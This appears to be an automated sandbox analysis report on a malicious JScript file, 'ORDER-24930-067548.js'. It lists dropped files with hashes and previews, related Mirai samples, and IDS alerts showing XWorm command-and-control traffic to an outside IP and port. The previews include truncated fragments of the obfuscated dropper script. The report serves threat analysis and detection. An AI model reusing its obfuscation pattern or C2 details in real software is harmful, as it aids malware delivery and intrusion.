AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | DluElZeE8W.elf | malicious | Mirai | 194.37.64.69
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | UK4ouvcZEA.elf | malicious | Mirai | 194.37.64.200
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | 6Z8m42DCVd.elf | malicious | Mirai | 194.37.64.62
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):520
                        Entropy (8bit):5.355496254154943
                        Encrypted:false
                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                        MD5:3C255C75EA6EB42410894C0D08A4E324
                        SHA1:34B3512313867B269C545241CD502B960213293A
                        SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                        SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                        Process:C:\Users\user\AppData\Roaming\Service.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):520
                        Entropy (8bit):5.355496254154943
                        Encrypted:false
                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                        MD5:3C255C75EA6EB42410894C0D08A4E324
                        SHA1:34B3512313867B269C545241CD502B960213293A
                        SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                        SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
                        Category:dropped
                        Size (bytes):1729444
                        Entropy (8bit):3.1698323653363847
                        Encrypted:false
                        SSDEEP:1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
                        MD5:C63888086E1646654A1E162FDE69C0FF
                        SHA1:8580DAFBFFE4D9B0D7E122127A455682AD2BD30E
                        SHA-256:262FB2E45F9B66956236F89F4CBEAC22EE3D011832263A28ED7F632A22AE87D7
                        SHA-512:DF2212775D03605673E6420EF74EC6C99FCDBF7E1DDE3287C97C634553F66FD084E0F38549134EC9E0FB8CEF4033BE92013A430AA7955F0C691F7EDFF02FCB66
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.1.!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".Z.r.!.
                        Process:C:\Windows\System32\wscript.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):59904
                        Entropy (8bit):7.846014380238068
                        Encrypted:false
                        SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                        MD5:7284765CA4D2F85C487796F437B01822
                        SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                        SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                        SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:Generic INItialization configuration [WIN]
                        Category:modified
                        Size (bytes):64
                        Entropy (8bit):3.6722687970803873
                        Encrypted:false
                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                        MD5:DE63D53293EBACE29F3F54832D739D40
                        SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                        SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                        SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                        Malicious:false
                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
                        Category:dropped
                        Size (bytes):1729444
                        Entropy (8bit):3.1698323653363847
                        Encrypted:false
                        SSDEEP:1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
                        MD5:C63888086E1646654A1E162FDE69C0FF
                        SHA1:8580DAFBFFE4D9B0D7E122127A455682AD2BD30E
                        SHA-256:262FB2E45F9B66956236F89F4CBEAC22EE3D011832263A28ED7F632A22AE87D7
                        SHA-512:DF2212775D03605673E6420EF74EC6C99FCDBF7E1DDE3287C97C634553F66FD084E0F38549134EC9E0FB8CEF4033BE92013A430AA7955F0C691F7EDFF02FCB66
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Preview:.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.!."" .!."..S.!.......................!.l..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."!.......................!.e..!.!.!.!."" .!."p.(.1.!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!."!.......................!.0..!.!.!.!."" .!.").!.......................!.;..!.!.!.!."" .!."".,.....".".,.....".Z.r.!.
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03708713717387235
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                        MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                        SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                        SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                        SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1373607036346451
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                        MD5:64BCCF32ED2142E76D142DF7AAC75730
                        SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                        SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                        SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8475592208333753
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                        MD5:BE99679A2B018331EACD3A1B680E3757
                        SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                        SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                        SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1373607036346451
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                        MD5:64BCCF32ED2142E76D142DF7AAC75730
                        SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                        SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                        SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):98304
                        Entropy (8bit):0.08235737944063153
                        Encrypted:false
                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):5242880
                        Entropy (8bit):0.03708713717387235
                        Encrypted:false
                        SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                        MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                        SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                        SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                        SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.1209886597424439
                        Encrypted:false
                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.1209886597424439
                        Encrypted:false
                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                        SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\GeUT.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):59904
                        Entropy (8bit):7.846014380238068
                        Encrypted:false
                        SSDEEP:1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
                        MD5:7284765CA4D2F85C487796F437B01822
                        SHA1:F1E51F7E021629857369888A16E201FB464B7A61
                        SHA-256:680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
                        SHA-512:17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3444
                        Entropy (8bit):5.011954215267298
                        Encrypted:false
                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                        MD5:B133A676D139032A27DE3D9619E70091
                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                        Malicious:false
                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:modified
                        Size (bytes):950
                        Entropy (8bit):2.8937402169492104
                        Encrypted:false
                        SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
                        MD5:9D007E669CE25371EE9401DC2AC21D2A
                        SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
                        SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
                        SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
                        Malicious:false
                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Describes all the counters supported via WMI Hi-Performance providers..//..//////////////////////////////////////////////////////////////////////////////////////////////......[info]..drivername=WmiApRpl..symbolfile=WmiApRpl.h....[languages]..009=English..009=English....
                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3444
                        Entropy (8bit):5.011954215267298
                        Encrypted:false
                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                        MD5:B133A676D139032A27DE3D9619E70091
                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                        Malicious:false
                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                        File type:ASCII text, with very long lines (7873), with CRLF line terminators
                        Entropy (8bit):3.4531804535577044
                        TrID:
                          File name:ORDER-24930-067548.js
                          File size:7'907 bytes
                          MD5:8fbf57ab035ec7063b9522e5f30a75f7
                          SHA1:cd761463221ba82f46b2b28fe56a0e74588c64b9
                          SHA256:ff84d777db298c70e206a94f1a4a1a5d5536d8cd42eedbd50ffde364daa368a6
                          SHA512:6fb68c7241c130973c1332a2f1c23c76cdb4640d76e270e1a0538a83001fe7d2aa4397ccb34def80ce88a5050f36d7bbaad7700fd9efa666c26bb0e6c4bc71d6
                          SSDEEP:96:lUu0CRu5u37arzWruLprCRuzrN+uQ6rgxX4murNdgCRufZQL76mXHNuipdWwp5i6:lUycqnDtjfQxaWpK+l
                          TLSH:16F1098C55B028323DA799E175D1EC0685C6ADD425EE007BE86A0C77B0699FF3DA14CF
                          File Content Preview:var P8q=163834344..var VGKGLV = String.fromCharCode(163834460-P8q,163834458-P8q,163834465-P8q,163834467-P8q,163834354-P8q,163834462-P8q,163834441-P8q,163834458-P8q,163834376-P8q,163834423-P8q,163834442-P8q,163834450-P8q,163834445-P8q,163834443-P8q,1638344
                          Icon Hash:68d69b8bb6aa9a86
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-01T07:38:25.156317+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:25.502240+02002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:29.771402+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:29.771402+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:33.846431+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:33.878120+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:44.077679+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:44.211472+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:44.293513+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:54.515877+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:54.517637+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:38:59.777922+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:38:59.777922+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:04.844685+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:04.846337+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:15.172918+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:39:15.176865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:39:25.500425+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
